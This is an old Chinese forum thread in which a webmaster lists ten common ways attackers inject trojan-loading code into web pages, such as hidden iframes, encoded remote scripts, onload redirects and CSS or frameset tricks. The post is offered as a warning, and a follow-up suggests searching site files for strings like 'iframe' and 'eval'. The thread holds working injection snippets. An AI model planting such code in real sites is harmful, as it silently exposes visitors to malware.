Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

站长注意:如何快速查找网页被挂马代码及黑客常用挂马代码大全

[复制链接]
仿制者-KM 发表于 2009-10-23 16:01:37 | 显示全部楼层 |阅读模式
本帖最后由 仿制者-KM 于 2009-10-23 16:23 编辑

最近我的一个电影网站老是被挂马,木马隐藏的又那么深。很是烦恼。。故收集了写黑客常用挂马大全。叫站长注意预防及查找。

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码 document.write(”<iframe width=&#39;0&#39; height=&#39;0&#39; src=&#39;地址&#39;></iframe>”); 保存为xxx.js,则JS挂马代码为 <script language=javascript src=xxx.js></script>

三:js变形加密
<SCRIPT language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后缀

四:body挂马
<body onload=“window.location=&#39;地址&#39;;”></body>

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + &#39;\r\n<iframe src=“http:网页地址/muma.htm/”></iframe>&#39;;

六:css中挂马 ==== body { background-image: url(&#39;javascript:document.write(”<script src=url地址/muma.js></script>”)&#39;)}

七:JAJA挂马 ==== <SCRIPT language=javascript> window.open (“地址”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”); </script>

八:图片伪装 ==== <html> <iframe src=“网马地址” height=0 width=0></iframe> <img src=“图片地址”></center> </html>

九:伪装调用 ==== <frameset rows=“444,0” cols=“*”> <frame src=“打开网页” framborder=“no” scrolling=“auto” noresize marginwidth=“0”margingheight=“0”> <frame src=“网马地址” frameborder=“no” scrolling=“no” noresize marginwidth=“0”margingheight=“0”> </frameset>

十:高级欺骗 ==== <a href=“http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)” onMouseOver=“www_163_com(); return true;”> 页面要显示的内容 </a> <SCRIPT Language=“JavaScript”> function www_163_com () { var url=“网马地址”; open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”); } </SCRIPT>
ken990941 发表于 2009-10-23 16:05:11 | 显示全部楼层
路过。。。。
回复

使用道具 举报

yzydis 发表于 2009-10-23 16:08:06 | 显示全部楼层
这个都是比较常见的 以前玩过挂马  这个东西更新太快 很快就又有别的方式 防不胜防啊!
回复

使用道具 举报

 楼主| 仿制者-KM 发表于 2009-10-23 16:11:38 | 显示全部楼层
我知道DreamWeaver有一个高级查找功能,可以查找当前文件夹内出现的指定字串。
你可以尝试着在文件夹内搜索"height=0","iframe","execute","eval"这一类敏感字符(注意选成大小写不敏感,比如偶放一句话马就是换大小写的)
回复

使用道具 举报

coldhair 发表于 2009-10-23 16:19:37 | 显示全部楼层
好办法,要经常查一查木马啊
回复

使用道具 举报

ken990941 发表于 2009-10-23 16:49:01 | 显示全部楼层
顶顶顶喔。
回复

使用道具 举报

maikongjian 发表于 2009-10-23 16:50:44 | 显示全部楼层
感谢分享哦.
回复

使用道具 举报

sky1986zhou 发表于 2012-2-26 17:11:29 | 显示全部楼层
谢了
回复

使用道具 举报

SSAY 发表于 2012-2-26 22:16:17 | 显示全部楼层
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-17 12:48 , Processed in 0.022701 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表